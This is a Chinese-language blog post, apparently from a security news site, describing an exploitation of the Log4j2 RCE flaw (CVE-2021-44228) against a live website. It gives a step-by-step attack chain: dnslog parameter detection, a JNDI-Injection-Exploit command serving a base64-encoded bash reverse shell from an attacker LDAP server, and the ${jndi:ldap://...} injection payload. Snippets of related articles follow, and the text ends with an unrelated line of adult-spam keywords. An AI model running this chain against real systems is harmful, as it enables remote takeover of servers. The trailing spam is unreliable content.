<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Log4j2 漏洞實戰案例

    VSole2022-02-23 09:18:32

    在現在以及未來的一段時間里,Log4j2 漏洞依然是滲透和排查的重點。在測試靶場里復現多次,在實戰中遇到還是十分興奮,So,總得記錄點什么吧。


    01、漏洞發現

    通過burp插件的方式,將Log4j2漏洞檢測能力集成到burp進行被動掃描。在訪問網站抓包的過程中,檢測到目標站點存在Log4j2 RCE漏洞。

    02、確認漏洞參數

    由于使用參數Fuzz,每個數據包里都夾帶多個參數注入Payload,我們需要進一步定位到具體的漏洞參數位置。

    (1)登錄ceye.io,可以查看當前的dnslog。

    (2)對比burp參數注入的payload和dnslog請求,可初步確認參數username存在Log4j2 RCE漏洞。

    03、構建ldap服務

    通過JNDI注入利用的工具,構建好惡意類地址和ldap服務,為進一步漏洞利用做好準備。

    (1)構建payload,將要執行的命令進行base64編碼,可通過Java Runtime 配合 bash 編碼實現。

    在線編碼地址:

    https://www.jackson-t.ca/runtime-exec-payloads.html
    


    (2)用JNDIExploit啟動一個ldap的服務。

    命令如下:

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "編碼后的bash反彈shell命令" -A “監聽的IP地址”
    

    04、獲取目標權限

    利用Log4j2漏洞向目標服務器發送構造的payload語句,反彈shell,從而獲取目標服務器權限。

    (1)啟動端口監聽

    (2)在burp進行構造payload,url編碼后發送請求。

    Payload:

    ?username=${jndi:ldap://xxx.xxx.xxx.xxx:1389/pgc2pp}
    


    (3)服務端成功接收到bash反彈的shell。

    payloadlog4j
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Log4j2漏洞出現有大半年的時間了,這個核彈級別的漏洞危害很大,但是這個漏洞檢測起來卻很麻煩,因為黑盒測試無法預判網站哪個應用功能在后臺調用了log4j2記錄日志功能。
    隨著時間的推移,舊的漏洞會不斷消失,而這個Log4j中的RCE漏洞可能需要幾年的時間才能得到妥善解決。
    目前的Log4j2檢測都需要借助dnslog平臺,是否存在不借助dnslog的檢測方式呢
    Log4j2 漏洞實戰案例
    2022-02-23 09:18:32
    在現在以及未來的一段時間里,Log4j2 漏洞依然是滲透和排查的重點。在測試靶場里復現多次,在實戰中遇到還是十分興奮,So,總得記錄點什么吧。
    端口掃描開始,發現驚喜
    Apache Log4j2高危漏洞一經發布,很多單位都在第一時間啟動應急響應進行修復。但因Apache Log的應用極其廣泛,其危害還在持續發酵過程中。綠盟科技使用網絡空間安全仿真平臺對Apache Log4j2漏洞環境進行了仿真,并在此環境上復現了漏洞的利用及修復方法,基于此演練場景可提升網絡安全人員針對此漏洞的應急水平。綠盟科技一直致力于將網絡安全前沿技術和安全事件提煉成仿真場景,通過場景式演
    近日,Apache Log4j2被爆出遠程代碼執行高危漏洞(CVE-2021-44228),由于該模塊被廣泛應用在中間件、開發框架、Web應用中,涉及用戶群體大,并且漏洞危害性高,導致漏洞影響力巨大,幾乎波及各行各業。 通過深信服云端數據監控,具有漏洞利用攻擊行為的數量爆發式增長,同時日志分析過程中發現H2Miner、Mirai、Muhstik、Z0Miner等多個黑產組織已將此漏洞利用融入了自
    Apache Log4j2從RCE到RC1繞過本文首發于先知社區:https://xz.aliyun.com
    雷神眾測擁有對此文章的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經雷神眾測允許,不得任意修改或者增減此文章內容,不得以任何方式將其用于商業目的。
    Java命名和目錄接口是Java編程語言中接口的名稱( JNDI )。它是一個API(應用程序接口),與服務器一起工作,為開發人員提供了查找和訪問各種命名和目錄服務的通用、統一的接口。 可以使用命名約定從數據庫獲取文件。JNDI為Java?戶提供了使?Java編碼語?在Java中搜索對象的?具。 簡單來說呢,JNDI相當與是Java里面的一個api,它可以通過命名來查找數據和對象。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类